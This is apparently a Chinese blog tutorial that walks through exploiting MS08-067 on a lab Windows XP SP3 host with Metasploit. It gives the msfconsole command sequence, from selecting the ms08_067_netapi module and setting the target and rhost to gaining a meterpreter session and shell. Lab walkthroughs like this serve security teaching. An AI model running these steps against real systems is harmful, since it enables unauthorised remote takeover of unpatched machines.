ms08-067漏洞攻击实践

Metasploit ms08_067漏洞攻击实践

环境准备

两台虚拟机,一台为kali,作为攻击机,一台为windows xp sp3

主机 IP
kali 192.168.78.145
windows xp sp3 192.168.78.144

攻击实践

1.在kali终端打开msfconsole

root@localhost:~# msfconsole

2.搜索相关插件

msf5 > search ms08_067

ms08-067漏洞攻击实践_第1张图片

3.使用该漏洞模块

use exploit/windows/smb/ms08_067_netapi

4.查看可以攻击的靶机操作系统型号

msf5 exploit(windows/smb/ms08_067_netapi) > show targets

ms08-067漏洞攻击实践_第2张图片

5.查看参数

ms08-067漏洞攻击实践_第3张图片

6.设置参数

  • 设置target

    msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
    
  • 设置靶机IP

    msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.78.144
    
  • 重新查看参数

ms08-067漏洞攻击实践_第4张图片

7.exploit开始攻击

ms08-067漏洞攻击实践_第5张图片

如图,攻击成功!

meterpreter

1.通过help命令查看meterpreter相关命令介绍

ms08-067漏洞攻击实践_第6张图片

2.meterpreter转shell

ms08-067漏洞攻击实践_第7张图片

你可能感兴趣的:(ms08-067漏洞攻击实践)